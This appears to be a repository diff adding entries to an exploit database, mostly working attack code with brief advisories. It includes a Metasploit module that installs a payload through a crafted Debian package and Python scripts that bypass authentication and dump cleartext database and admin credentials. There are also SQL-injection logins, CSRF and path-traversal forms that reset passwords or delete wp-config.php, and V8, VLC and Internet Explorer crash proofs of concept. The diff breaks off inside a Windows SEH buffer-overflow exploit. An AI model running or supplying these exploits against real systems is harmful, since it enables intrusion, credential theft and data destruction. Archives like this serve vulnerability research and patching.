upload "#{pkg_path}/DEBIAN/control", pkg
upload_and_chmodx "#{pkg_path}/DEBIAN/postinst", "#!/bin/sh\n#{payload_path} &"
cmd_exec "dpkg-deb --build '#{pkg_path}'"
unless file_exist? "#{pkg_path}.deb"
fail_with Failure::Unknown, 'Building package failed'
end
print_status 'Uploading payload...'
upload_and_chmodx payload_path, generate_payload_exe
print_status 'Installing package...'
res = install_package pkg_name, "#{pkg_path}.deb"
vprint_line res
unless res.include? 'object path'
fail_with Failure::Unknown, 'Package installation failed. Check /var/log/lastore/daemon.log'
end
Rex.sleep 15
print_status 'Removing package...'
res = remove_package pkg_name.downcase
vprint_line res
unless res.include? 'object path'
print_warning 'Package removal failed. Check /var/log/lastore/daemon.log'
end
end
end

7
exploits/multiple/dos/44526.txt Normal file
View file

@ -0,0 +1,7 @@
The attached fuzzed swf file causes heap overflow when playing a sound.
This PoC crashes a little bit unreliably, it is the most reliable in the standalone Flash player and Microsoft Edge.
Proof of Concept:
https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/44526.zip

7
exploits/multiple/dos/44527.txt Normal file
View file

@ -0,0 +1,7 @@
The attached fuzzed swf file causes heap or stack corruption (depending on platform) when rendering a slab.
This PoC crashes a little bit unreliably, it is the most reliable in the standalone Flash player and Microsoft Edge.
Proof of Concept:
https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/44527.zip

7
exploits/multiple/dos/44528.txt Normal file
View file

@ -0,0 +1,7 @@
The attached image causes an info leak in image inflation. It occasionally crashes when rendered, otherwise it displays uninitialized memory as pixels.
To reproduce, put the attached images on a webserver and vist: http://127.0.0.1?img=inflate.png.
Proof of Concept:
https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/44528.zip

7
exploits/multiple/dos/44529.txt Normal file
View file

@ -0,0 +1,7 @@
The attached swf file causes and out-of-bounds write in blur filtering.
This PoC crashes reliably in Firefox for Linux.
Proof of Concept:
https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/44529.zip

80
exploits/multiple/dos/44530.js Normal file
View file

@ -0,0 +1,80 @@
/*
https://cs.chromium.org/chromium/src/v8/src/compiler/node-properties.cc?rcl=df84e87191022bf6914f9570069908f10b303245&l=416
Here's a snippet of NodeProperties::InferReceiverMaps.
case IrOpcode::kJSCreate: {
if (IsSame(receiver, effect)) {
HeapObjectMatcher mtarget(GetValueInput(effect, 0));
HeapObjectMatcher mnewtarget(GetValueInput(effect, 1));
if (mtarget.HasValue() && mnewtarget.HasValue()) {
Handle<JSFunction> original_constructor =
Handle<JSFunction>::cast(mnewtarget.Value());
if (original_constructor->has_initial_map()) {
Handle<Map> initial_map(original_constructor->initial_map());
if (initial_map->constructor_or_backpointer() ==
*mtarget.Value()) {
*maps_return = ZoneHandleSet<Map>(initial_map);
return result;
}
}
}
// We reached the allocation of the {receiver}.
return kNoReceiverMaps;
}
break;
}
"mnewtarget" is expected to be a constructor which also can be of type JSBoundFunction. But "mnewtarget" is always cast to JSFunction which leads to type confusion.
The PoC seems not to crash in release mode.
Debug mode log:
#
# Fatal error in ../../src/objects-inl.h, line 566
# Check failed: !v8::internal::FLAG_enable_slow_asserts || (object->IsJSFunction()).
#
==== C stack trace ===============================
/v8/out.gn/x64.debug/./libv8_libbase.so(v8::base::debug::StackTrace::StackTrace()+0x1e) [0x7f4623e1043e]
/v8/out.gn/x64.debug/./libv8_libplatform.so(+0x30907) [0x7f4623db3907]
/v8/out.gn/x64.debug/./libv8_libbase.so(V8_Fatal(char const*, int, char const*, ...)+0x1bd) [0x7f4623df876d]
/v8/out.gn/x64.debug/./libv8.so(v8::internal::JSFunction::cast(v8::internal::Object*)+0x64) [0x7f46226584a4]
/v8/out.gn/x64.debug/./libv8.so(v8::internal::Handle<v8::internal::JSFunction> const v8::internal::Handle<v8::internal::JSFunction>::cast<v8::internal::JSFunction>(v8::internal::Handle<v8::internal::JSFunction>)+0x23) [0x7f4622651173]
/v8/out.gn/x64.debug/./libv8.so(v8::internal::compiler::NodeProperties::InferReceiverMaps(v8::internal::compiler::Node*, v8::internal::compiler::Node*, v8::internal::ZoneHandleSet<v8::internal::Map>*)+0x435) [0x7f4622c24a75]
/v8/out.gn/x64.debug/./libv8.so(v8::internal::compiler::JSNativeContextSpecialization::InferReceiverMaps(v8::internal::compiler::Node*, v8::internal::compiler::Node*, std::__1::vector<v8::internal::Handle<v8::internal::Map>, std::__1::allocator<v8::internal::Handle<v8::internal::Map> > >*)+0x50) [0x7f4622b8b820]
/v8/out.gn/x64.debug/./libv8.so(v8::internal::compiler::JSNativeContextSpecialization::ExtractReceiverMaps(v8::internal::compiler::Node*, v8::internal::compiler::Node*, v8::internal::FeedbackNexus const&, std::__1::vector<v8::internal::Handle<v8::internal::Map>, std::__1::allocator<v8::internal::Handle<v8::internal::Map> > >*)+0x202) [0x7f4622b82632]
/v8/out.gn/x64.debug/./libv8.so(v8::internal::compiler::JSNativeContextSpecialization::ReduceNamedAccessFromNexus(v8::internal::compiler::Node*, v8::internal::compiler::Node*, v8::internal::FeedbackNexus const&, v8::internal::Handle<v8::internal::Name>, v8::internal::compiler::AccessMode)+0x2e6) [0x7f4622b822b6]
/v8/out.gn/x64.debug/./libv8.so(v8::internal::compiler::JSNativeContextSpecialization::ReduceJSStoreNamed(v8::internal::compiler::Node*)+0x298) [0x7f4622b7c2c8]
/v8/out.gn/x64.debug/./libv8.so(v8::internal::compiler::JSNativeContextSpecialization::Reduce(v8::internal::compiler::Node*)+0x11f) [0x7f4622b78f7f]
/v8/out.gn/x64.debug/./libv8.so(v8::internal::compiler::GraphReducer::Reduce(v8::internal::compiler::Node*)+0x285) [0x7f4622ad8c55]
/v8/out.gn/x64.debug/./libv8.so(v8::internal::compiler::GraphReducer::ReduceTop()+0x44f) [0x7f4622ad874f]
/v8/out.gn/x64.debug/./libv8.so(v8::internal::compiler::GraphReducer::ReduceNode(v8::internal::compiler::Node*)+0x1bc) [0x7f4622ad7cfc]
/v8/out.gn/x64.debug/./libv8.so(v8::internal::compiler::GraphReducer::ReduceGraph()+0x2d) [0x7f4622ad89bd]
/v8/out.gn/x64.debug/./libv8.so(v8::internal::compiler::InliningPhase::Run(v8::internal::compiler::PipelineData*, v8::internal::Zone*)+0x58a) [0x7f4622c46e2a]
PoC:
*/
// Flags: --allow-natives-syntax --enable_slow_asserts
class Base {
constructor() {
this.x = 1;
}
}
class Derived extends Base {
constructor() {
// JSCreate emitted I guess.
super();
}
}
let bound = Object.bind();
Reflect.construct(Derived, [], bound); // Feed a bound function as new.target to the profiler, so HeapObjectMatcher can find it.
%OptimizeFunctionOnNextCall(Derived);
new Derived();

51
exploits/php/webapps/44503.txt Normal file
View file

@ -0,0 +1,51 @@
# Exploit Title: UK Cookie Consent v2.3.9 - Persistent Cross-Site Scripting
# Date: 2018-04-22
# Exploit Author: B0UG
# Vendor Homepage: https://catapultthemes.com/
# Software Link: https://en-gb.wordpress.org/plugins/uk-cookie-consent/#description
# Version: Tested on version 2.3.9 (older versions may also be affected)
# Tested on: WordPress
# Category : Webapps
# CVE: CVE-2018-10310
I. VULNERABILITY
-------------------------
Persistent Cross-Site Scripting
II. BACKGROUND
-------------------------
UK Cookie Consent is a WordPress plugin which has been designed to display cookie consent notifications on a WordPress website.
III. DESCRIPTION
-------------------------
A persistent cross-site scripting vulnerability has been identified in the web interface of the plugin that allows the execution of arbitrary HTML/script code to be executed in a victim's web browser.
IV. PROOF OF CONCEPT
-------------------------
1) Access WordPress control panel.
2) Navigate to the 'Pages'.
3) Add a new page and insert the script you wish to inject into the page title.
4) Now navigate to 'Settings' and select 'Cookie Consent'.
5) Now click on the 'Content' tab.
6) Your injected script will now be executed.
V. IMPACT
-------------------------
An attacker can execute malicious code in a victim user's browser to perform various activities such as stealing cookies, session tokens, credentials and personal data amongst others.
VI. SYSTEMS AFFECTED
-------------------------
WordPress websites running "UK Cookie Consent" plugin version 2.3.9 (older versions may also be affected).
VII. REMEDIATION
-------------------------
Update to the latest version available. Implement a web application such as Wordfence.
VIII. DISCLOSURE TIMELINE
-------------------------
April 22, 2018 1: Vulnerability identified.
April 22, 2018 2: Informed developer of the vulnerability.
April 23, 2018 3: Developer acknowledged the vulnerability.
April 23, 2018 4: Developer issued a security patch.
Special thanks goes to the team at Catapult Themes for their fast response, great understanding and patching the issue.

23
exploits/php/webapps/44504.txt Normal file
View file

@ -0,0 +1,23 @@
# Exploit Title: WUZHI CMS 4.1.0 - Cross-Site Request Forgery
# Date: 2018-04-23
# Exploit Author: jiguang (s1@jiguang.in)
# Vendor Homepage: https://github.com/wuzhicms/wuzhicms
# Software Link: https://github.com/wuzhicms/wuzhicms
# Version: 4.1.0
# CVE: CVE-2018-10312
An issue was discovered in WUZHI CMS 4.1.0 (https://github.com/wuzhicms/wuzhicms/issues/132)
There is a csrf vulnerability that can modifying the member's password. via index.php?m=member&v=pw_reset
After the member logged in. open the exp page
<html>
<body>
<script>history.pushState('', '', '/')</script>
<form action="http://localhost/www/index.php?m=member&v=pw_reset" method="POST">
<input type="hidden" name="password" value="yuduo" />
<input type="hidden" name="password2" value="yuduo" />
<input type="hidden" name="submit" value="ç&#161;&#174;&#32;å&#174;&#154;" />
<input type="submit" value="Submit request" />
</form>
</body>
</html>

44
exploits/php/webapps/44512.txt Normal file
View file

@ -0,0 +1,44 @@
# Exploit Title: Monstra CMS 3.0.4 allows remote attackers to delete folder via an get request
# Date: 2018-03-26
# Exploit Author: Wenming Jiang
# Vendor Homepage: https://github.com/monstra-cms/monstra
# Software Link: https://github.com/monstra-cms/monstra
# Version: 3.0.4
# Tested on: macos 10.12.6, php 5.6, apache2.2.29
# CVE :CVE-2018-9038
Description:
Monstra CMS 3.0.4 allows remote attackers to delete folder via an admin/index.php?id=filesmanager&delete_dir=./&path=uploads/ request.
Steps to Reproduce:
1、Log in as a user with page editing permissions
2、Request http://your_site/admin/index.php?id=filesmanager&delete_dir=./&path=uploads
3、The uploads folder will be deleted.
Poc code:
GET /monstra/admin/index.php?id=filesmanager&delete_dir=./&path=uploads/&token=008708df48237172f6fe2d173dc30529eac132de HTTP/1.1
Host: localhost:8000
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/67.0.3396.10 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Referer: http://localhost:8000/monstra/admin/index.php?id=filesmanager&path=uploads/
Accept-Language: zh,zh-CN;q=0.9,en;q=0.8,zh-TW;q=0.7
Cookie: SQLiteManager_currentLangue=2; PHPSESSID=882dd1e203c979cedba4524f8107eca3; _ga=GA1.1.1742657188.1524382699; _gid=GA1.1.918663288.1524382699
Connection: close
Vulnerability Type:
Insecure Permissions
Expected Behavior:
deleted uploads folder
Possible Solutions:
Strictly filter the delete_dir parameter and replace './' with '_/'

156
exploits/php/webapps/44513.py Executable file
View file

@ -0,0 +1,156 @@
'''
# Exploit Title: Interspire Email Marketer - Remote Admin Authentication Bypass
# Google Dork: intitle:"Control Panel" + emailmarketer
# Date: 4-22-18
# Exploit Author: devcoinfet
# Vendor Homepage: www.interspire.com/emailmarketer
# Software Link: Can't legally provide link but can be found on net
# Version: [6.1.3-6.1.6]
# Tested on: Below 6.1.6
# CVE : CVE-2017-14322
https://security.infoteam.ch/en/blog/posts/narrative-of-an-incident-response-from-compromise-to-the-publication-of-the-weakness.html
https://github.com/joesmithjaffa/CVE-2017-14322
thanks to above Researchers
1. Description
this is used like this
--------------------------
exploit.py url/email-marketer/admin/index.php
2. Proof of Concept
'''
import requests
import sys
from bs4 import BeautifulSoup
from pprint import pprint
def cookie_cutter(url):
    with requests.Session() as s:
       s.get(url)
       r = s.get(url)
       response_regex = r.text
       print("requesting initial Cookie\n")
       print(str(r.headers)+"\n")
      
       for key,value in s.cookies.items():
           if key and "IEMSESSIONID" in key:
         
              s.cookies.set('IEM_CookieLogin', "YTo0OntzOjQ6InVzZXIiO3M6MToiMSI7czo0OiJ0aW1lIjtpOjE1MDU0NzcyOTQ7czo0OiJyYW5kIjtiOjE7czo4OiJ0YWtlbWV0byI7czo5OiJpbmRleC5waHAiO30%3D")
       print("Attempting To Posion 2nd request with Forged Cookie\n")
       print("-" * 25)
       r = s.get(url)
       response_regex2 = r.text
       print response_regex2
       print(str(r.headers) + "\n")
       if response_regex != response_regex2:
          for key,value in s.cookies.items():
              if "IEMSESSIONID" in key:
                 try:
                    #using session riding from previous cookie we grab the info we want :)
                    bounce_info_grab(url,value)
                    app_info_grab(url,value)
                    privt_info_grab(url,value)
                 except:
                     pass
                 return value,r.text
def bounce_info_grab(url,session_to_ride):
    url_grab = url+"?Page=Settings&Tab=2"
    print(url_grab)
    with requests.Session() as s:
       s.get(url_grab)
       s.cookies.set('IEMSESSIONID',session_to_ride)
       r = s.get(url_grab)
       response_regex = r.text
       soup = BeautifulSoup(response_regex,'html5lib')
       div = soup.find('div', id='div7')
     
       
       outfile = open("bounce_report.txt",'w')
       dataout = """<html><head>Report</head><title>Report</title>
                    <body>""" + str(div) +"""</body></html>"""
       outfile.write(dataout)
       outfile.close()
       for divy in div.contents:
           print(divy)
         
def app_info_grab(url,session_to_ride):
    url_grab = url+"?Page=Settings&Tab=2"
    print(url_grab)
    with requests.Session() as s:
       s.get(url_grab)
       s.cookies.set('IEMSESSIONID',session_to_ride)
       r = s.get(url_grab)
       response_regex = r.text
       soup = BeautifulSoup(response_regex,'html5lib')
       div = soup.find('div', id='div1')
   
       
       outfile = open("application_settings_report.txt",'w')
       dataout = """<html><head>Report</head><title>Report</title>
                    <body>""" + str(div) +"""</body></html>"""
       outfile.write(dataout)
       outfile.close()
       for divy in div.contents:
           print(divy)  
   
def privt_info_grab(url,session_to_ride):
    url_grab = url+"?Page=Settings&Tab=2"
    print(url_grab)
    with requests.Session() as s:
       s.get(url_grab)
       s.cookies.set('IEMSESSIONID',session_to_ride)
       r = s.get(url_grab)
       response_regex = r.text
       soup = BeautifulSoup(response_regex,'html5lib')
       div = soup.find('div', id='div8')
    
       
       outfile = open("privtlbl_settings_report.txt",'w')
       dataout = """<html><head>Report</head><title>Report</title>
                    <body>""" + str(div) +"""</body></html>"""
       outfile.write(dataout)
       outfile.close()
       for divy in div.contents:
           print(divy)  
   
def main():
    url = sys.argv[1]
    print  "Evaluating Target:" +url+ """ For CVE-2017-14322"""+"\n"
    print "-" * 25
    try:
       session_rider_value,content = cookie_cutter(url)
       print "Session Has Been Generated Entering Internal Data Dumping Routine"+"\n"
       print "-" * 25
       print "Magic Cookie Generated Modify Existing IEMSESSIONID Value In browser With Below Value "
       print "-" * 25
       print  session_rider_value+"\n"
       print "-" * 25
    except:
       print "Target Is Not Vulnerable"
       pass
  
   
main()
'''
When Running this, if it is succesful check for 3 files in the directory of exploit to find crucial internal configs in Html format
do not use this for bad just dont do it please.
 
3. Solution:
  
Update to version 6.1.6 atleast
http://www.interspire.com/emailmarketer
'''

138
exploits/php/webapps/44515.py Executable file
View file

@ -0,0 +1,138 @@
# -*- coding: utf-8 -*-
# Exploit Title: Ericsson-LG iPECS NMS - Cleartext Cred. Dump
# Vendor Notification: 03-03-2018 - No response
# Initial CVE: 04-04-2018
# Disclosure: 21-04-2018
# Exploit Author: Berk Cem Göksel
# Contact: twitter.com/berkcgoksel || bgoksel.com
# Vendor Homepage: http://www.ipecs.com/
# Version: A.1Ac and possibly earlier
# Tested on: Windows 2008 R2 x64
# CVE-2018-9245: Multiple SQL injections
# CVE-2018-10285: Incorrect access control
# CVE-2018-10286: Sensitive information disclosure
#--------Description--------#
#
#
# The Ericsson-LG iPECS NMS version A.1Ac and possibly earlier disclose sensitive
# information such as cleartext database and NMS login credentials, use incorrect
# access control mechanisms, are vulnerable to MiTM attacks and are prone to
# SQL injection attacks on multiple parameters.
#
# This script dumps some sensitive information.
#
#
# Why use it?
#
# Normally, you can bypass the login through the SQLi but will get "kicked out".
# Thankfully, we can leverage this to extract the actual admin credentials for
# the web app. In order to do this, we must first dump the database
# credentials in cleartext.
#
#
# Usage = python cred_dump.py IP_adress port
# Example = python cred_dump.py 192.168.1.35 80
from sys import argv
import sys
import os
import time
import requests
import re
if len(argv) != 3:
print "The script takes two mandatory arguments."
print "\nExample usage: python cred_dump.py 192.168.1.35 80"
sys.exit("Exiting...")
arg,IP,port=argv
#Log in through SQLi. Otherwise the next POST request is rejected.
sqli_path = "/nms/php/module/main/main_login.php"
sqli_url = "http://" + IP + ":" + port + sqli_path
sqli_cookies = {"mainTab_selectedChild": "sysinfoTab"}
sqli_headers = {"User-Agent": "Mozilla/5.0 (X11; Linux x86_64; rv:52.0) Gecko/20100101 Firefox/52.0", "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8", "Accept-Language": "en-US,en;q=0.5", "Accept-Encoding": "gzip, deflate", "Referer": "http://192.168.1.55/index.html", "Connection": "close", "Upgrade-Insecure-Requests": "1", "Content-Type": "application/x-www-form-urlencoded"}
sqli_data={"id": "1", "passwd": "1' or 1=1--"}
r = requests.post(sqli_url, headers=sqli_headers, cookies=sqli_cookies, data=sqli_data)
print(r.status_code, r.reason)
time.sleep(1)
#Thanks to incorrect access control we can
#dump cleartext database credentials
dump_path = "/nms/php/module/main/main_start.php"
dump_url = "http://" + IP + ":" + port + dump_path
nms_cookie = {"mainTab_selectedChild": "sysinfoTab"}
nms_headers = {"User-Agent": "Mozilla/5.0 (X11; Linux x86_64; rv:52.0) Gecko/20100101 Firefox/52.0", "Accept": "*/*", "Accept-Language": "en-US,en;q=0.5", "Accept-Encoding": "gzip, deflate", "Referer": "http://192.168.1.55/nms/index.html", "Content-Type": "application/x-www-form-urlencoded", "X-Requested-With": "XMLHttpRequest", "Connection": "close"}
nms_data={"command": "nms_start", "client_id": "20"}
r2 = requests.post(dump_url, headers=nms_headers, cookies=nms_cookie, data=nms_data)
print(r2.status_code, r2.reason)
db_cred_dump = r2.content
time.sleep(1)
#Extract db user and db pass from the dump
m = re.search(r"db_user:'(.*)'.*db_pwd:'([^']*)", db_cred_dump)
if m is not None:
postgre_db_user = m.group(1)
postgre_db_pwd = m.group(2)
else:
print "Something went wrong parsing the credentials. Check the dump manually."
client_id = "2" #Doesn't really matter
user_id = "10" #Doesn't matter either
db_user = postgre_db_user # This does matter
db_pwd = postgre_db_pwd # So does this
#Use db user and password to extract admin credentials for the NMS
users_path = "/nms/php/module/init/module_init.php"
users_url = "http://" + IP + ":" + port + users_path
users_cookies = {"mainTab_selectedChild": "sysinfoTab"}
users_headers = {"User-Agent": "Mozilla/5.0 (X11; Linux x86_64; rv:52.0) Gecko/20100101 Firefox/52.0", "Accept": "*/*", "Accept-Language": "en-US,en;q=0.5", "Accept-Encoding": "gzip, deflate", "Referer": "http://192.168.1.55/nms/index.html", "Content-Type": "application/x-www-form-urlencoded", "X-Requested-With": "XMLHttpRequest", "Connection": "close"}
users_data={"command": "init_configuration", "client_id": "2", "user_id": user_id, "db_user": db_user, "db_pwd": db_pwd, "mfimSeq": "0", "req_system_id": "0", "req_system_name": ''}
r3 = requests.post(users_url, headers=users_headers, cookies=users_cookies, data=users_data)
print(r3.status_code, r3.reason)
user_dump = r3.content
print "Done. You can log in to the postgresql database using the below credentials."
print "\ndb_user: " + postgre_db_user
print "db_pwd: " + postgre_db_pwd
print "\nAnd/Or you can log in to the NMS using the following credentials"
m1 = re.search(r"userList:\[\[\d,'([^']*)','([^']*)", user_dump)
if m1 is not None:
nms_admin = m1.group(1)
nms_pwd = m1.group(2)
print "\ndb_admin: " + nms_admin
print "db_pwd: " + nms_pwd
else:
print "\nDid not get nms_admin and nms_pwd. Check the dump manually."
dumpfile = open("ipecsnms_dump.txt","w")
dumpfile.write(db_cred_dump)
dumpfile.write(user_dump)
dumpfile.close()
print "\nRaw output written to ipecsnms_dump.txt for further username and group enumeration."
print "Have fun!"

42
exploits/php/webapps/44520.html Normal file
View file

@ -0,0 +1,42 @@
<!--
# Exploit Title: Plugin to Wordpress Woo Import Export 1.0 RCE Unlink
# Date: 24/04/2018
# Exploit Author: Lenon Leite
# Vendor Homepage: * https://wordpress.org/plugins/woo-import-export-lite/
# Software Link: * https://wordpress.org/plugins/woo-import-export-lite/
# Contact: http://twitter.com/lenonleite
# Website: http://lenonleite.com.br/
# Category: webapps
# Version: 1.0
# Tested on: Ubuntu 16.1
1 - Description
- Type user access: any user registered.
- $_POST['file_name'] is not escaped.
Article:
*http://lenonleite.com.br/en/publish-exploits/english-plugin-woo-import-export-1-0-rce-unlink/
Video:
*https://www.youtube.com/watch?v=pImtGeecdCk
2. Proof of Concept
-->
<form method="post"
action="http://server/wp-admin/admin-ajax.php?action=wpie_remove_export_entry">
<input type="text" name="file_name" value="../../../wp-config.php">
<input type="text" name="log_id" value="aaa">
<input type="submit">
</form>
<!--
- Date Discovery : *11/25/2017*
- Date Vendor Contact : *12/29/2017*
- Date Publish : 24/04/2018
- Date Resolution :
-->

62
exploits/windows/dos/44514.py Executable file
View file

@ -0,0 +1,62 @@
"""
VLC Media Player/Kodi/PopcornTime 'Red Chimera' < 2.2.5 Memory Corruption (PoC)
Author: SivertPL (kroppoloe@protonmail.ch)
CVE: CVE-2017-8311
Infamous VLC/Kodi/PopcornTime subtitle attack in libsubtitle_plugin.dll.
This is the Proof of Concept of the reverse engineered heap corruption vulnerability affecting JacoSUB parsing in VLC/Kodi/PopcornTime.
The crash is exploitable, but hard to exploit because of various environmental constraints such as threading/mitigations/scriptless.
I want to join a research team.
"""
"""
ModLoad: 00000000`71660000 00000000`716a2000 C:\Program Files (x86)\VideoLAN\VLC\plugins\demux\libmp4_plugin.dll
ModLoad: 00000000`71630000 00000000`71651000 C:\Program Files (x86)\VideoLAN\VLC\plugins\demux\libavi_plugin.dll
ModLoad: 00000000`71610000 00000000`7162e000 C:\Program Files (x86)\VideoLAN\VLC\plugins\demux\libasf_plugin.dll
ModLoad: 00000000`71600000 00000000`7160d000 C:\Program Files (x86)\VideoLAN\VLC\plugins\demux\libdemux_cdg_plugin.dll
ModLoad: 00000000`715e0000 00000000`715fd000 C:\Program Files (x86)\VideoLAN\VLC\plugins\demux\libvobsub_plugin.dll
ModLoad: 00000000`715d0000 00000000`715de000 C:\Program Files (x86)\VideoLAN\VLC\plugins\demux\libdemux_stl_plugin.dll
ModLoad: 00000000`715b0000 00000000`715cf000 C:\Program Files (x86)\VideoLAN\VLC\plugins\demux\libsubtitle_plugin.dll
core demux error: option sub-original-fps does not exist
(33c.d10): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
*** ERROR: Symbol file could not be found. Defaulted to export symbols for C:\Program Files (x86)\VideoLAN\VLC\plugins\demux\libsubtitle_plugin.dll -
libsubtitle_plugin+0x44de:
715b44de 881f mov byte ptr [edi],bl ds:002b:1b9fb000=??
0:012:x86> g
(33c.d10): Access violation - code c0000005 (!!! second chance !!!)
wow64!Wow64NotifyDebugger+0x1d:
00000000`754ac9f1 654c8b1c2530000000 mov r11,qword ptr gs:[30h] gs:00000000`00000030=????????????????
"""
import os
import struct
import sys
import argparse
len = 1025
def main(argv):
parser = argparse.ArgumentParser()
parser.add_argument("filename", help="Name of the movie file w/o extension, for generating payload")
parser.add_argument("--length", help="Heap overwrite length (default 1025, may be bigger)", type=int)
args = parser.parse_args()
if args.length:
global len
len = args.length
print "[+] Generating file %s.jss with overwrite size of %d" % (args.filename, len)
write(args.filename, len)
def write(name, len):
subtitles = open("%s.jss" % name, "w+")
subtitles.write("0:00:02.00 0:00:04.00 VL red chimera..\n")
subtitles.write("0:00:04.00 0:00:05.00 vm attack")
subtitles.write("\\C")
subtitles.write(struct.pack('B', 0))
subtitles.write('A' * len)
subtitles.close()
print "[+] Done!"
if __name__ == "__main__":
main(sys.argv[1:])

156
exploits/windows/dos/44525.py Executable file
View file

@ -0,0 +1,156 @@
'''
[+] Credits: John Page (aka hyp3rlinx)
[+] Website: hyp3rlinx.altervista.org
[+] Source: http://hyp3rlinx.altervista.org/advisories/MICROSOFT-INTERNET-EXPLORER-(Win-10)-DENIAL-OF-SERVICE.txt
[+] ISR: ApparitionSec
Vendor:
=======
www.microsoft.com
Product:
========
Internet Explorer (Windows 10)
v11.371.16299.0
Internet Explorer is a series of graphical web browsers developed by Microsoft and included in the Microsoft Windows line of operating systems, starting in 1995.
Vulnerability Type:
==================
Denial Of Service
CVE Reference:
==============
N/A
Security Issue:
================
A null pointer de-reference (read) results in an InternetExplorer Denial of Service (crash) when MSIE encounters an specially crafted
HTML HREF tag containing an empty reference for certain Windows file types. Upon IE crash it will at times daringly attempt to restart itself,
if that occurs and user is prompted by IE to restore their browser session, then selecting this option so far in my tests has shown to repeat the
crash all over again. This can be leveraged by visiting a hostile webpage or link to crash an end users MSIE browser.
Referencing some of the following extensions .exe:, .com:, .pif:, .bat: and .scr: should produce the same :)
Tested Windows 10
Stack Dump:
==========
(2e8c.27e4): Access violation - code c0000005 (first/second chance not available)
ntdll!NtWaitForMultipleObjects+0x14:
00007ffa`be5f0e14 c3 ret
0:015> r
rax=000000000000005b rbx=0000000000000003 rcx=0000000000000003
rdx=000000cca6efd3a8 rsi=0000000000000000 rdi=0000000000000003
rip=00007ffabe5f0e14 rsp=000000cca6efcfa8 rbp=0000000000000000
r8=0000000000000000 r9=0000000000000000 r10=0000000000000000
r11=0000000000000246 r12=0000000000000010 r13=000000cca6efd3a8
r14=0000000000000000 r15=0000000000000000
iopl=0 nv up ei pl zr na po nc
cs=0033 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00000246
ntdll!NtWaitForMultipleObjects+0x14:
00007ffa`be5f0e14 c3 ret
CONTEXT: (.ecxr)
rax=0000000000000000 rbx=000001fd4a2ec9d8 rcx=0000000000000000
rdx=00007ffabb499398 rsi=000001fd4a5b0ce0 rdi=0000000000000000
rip=00007ffabb7fc646 rsp=000000cca6efe4f8 rbp=000000cca6efe600
r8=0000000000000000 r9=0000000000008000 r10=00007ffabb499398
r11=0000000000000000 r12=0000000000000000 r13=00007ffabb48d060
r14=0000000000000002 r15=0000000000000001
iopl=0 nv up ei pl zr na po nc
cs=0033 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00010246
KERNELBASE!StrCmpICW+0x6:
00007ffa`bb7fc646 450fb70b movzx r9d,word ptr [r11] ds:00000000`00000000=????
Resetting default scope
FAULTING_IP:
KERNELBASE!StrCmpICW+6
00007ffa`bb7fc646 450fb70b movzx r9d,word ptr [r11]
EXCEPTION_RECORD: (.exr -1)
ExceptionAddress: 00007ffabb7fc646 (KERNELBASE!StrCmpICW+0x0000000000000006)
ExceptionCode: c0000005 (Access violation)
ExceptionFlags: 00000000
NumberParameters: 2
Parameter[0]: 0000000000000000
Parameter[1]: 0000000000000000
Attempt to read from address 0000000000000000
DEFAULT_BUCKET_ID: NULL_POINTER_READ
PROCESS_NAME: iexplore.exe
POC video URL:
==============
https://vimeo.com/265691256/
Exploit/POC:
============
1) Run below python script to create "IE-Win10-Crasha.html"
2) Open IE-Win10-Crasha.html in InternetExplorer v11.371.16299 on Windows 10
'''
payload=('<br>\n'+
'<center>MSIE v11.371.16299 Denial Of Service by hyp3rlinx <br>\n'+
'<a href=".cmd:" id="hate">crashy ware shee</a>\n'+
'<br>\n'+
'Tested successfully on Windows 10\n'+
'</center><script>\n'
'function doit(){\n'+
'document.getElementById("hate").click();\n'
'alert("DOH!");\n'+
'obj.click();\n'+
'obj.click();\n'+
'}\n'+
'setInterval("doit()", 2000)\n'+
'</script>')
file=open("IE-Win10-Crasha.html","w")
file.write(payload)
file.close()
print 'MS InternetExplorer (Win 10) '
print 'Denial Of Service File Created.'
print 'hyp3rlinx'
'''
Network Access:
===============
Remote
Severity:
=========
Medium
Disclosure Timeline:
=============================
Vendor Notification: April 18, 2018
vendor closes thread : April 19, 2018
April 20, 2018 : Public Disclosure
[+] Disclaimer
The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise.
Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and
that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit
is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility
for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information
or exploits by the author or elsewhere. All content (c).
hyp3rlinx
'''

83
exploits/windows/local/44516.py Executable file
View file

@ -0,0 +1,83 @@
#!/usr/bin/python
#
# Exploit Author: bzyo
# CVE: CVE-2018-9060
# Twitter: @bzyo_
# Exploit Title: R 3.4.4 - Local Buffer Overflow
# Date: 03-27-2018
# Vulnerable Software: R 3.4.4
# Vendor Homepage: https://www.r-project.org/
# Version: 3.4.4
# Software Link: https://cloud.r-project.org/bin/windows/
# Tested On: Windows 7 x86
#
# Timeline:
# 03-27-18: Emailed author, no response
# 04-03-18: Emailed author, no response
# 04-10-18: Emailed author, no response
# 04-23-18: New version released; Submitted public disclosure
#
# lots of bad chars, use alpha_mixed
# badchars \x00\x0a\x0d\x0e and \x80 through \xbf
#
#
# PoC:
# 1. generate r344.txt, copy contents to clipboard
# 2. open app, select Edit, select 'GUI preferences'
# 3. paste r344.txt contents into 'Language for menus and messages'
# 4. select OK
# 5. pop calc
#
filename="r344.txt"
junk = "A"*900
#jump 6
nseh = "\xeb\x06\xcc\xcc"
#0x643c17af : pop esi # pop edi # ret | {PAGE_EXECUTE_READ} [Riconv.dll]
seh = "\xaf\x17\x3c\x64"
#msfvenom -a x86 -p windows/exec CMD=calc.exe -b "\x00\x0a\x0d\x0e" -e x86/alpha_mixed -f c
#Payload size: 448 bytes
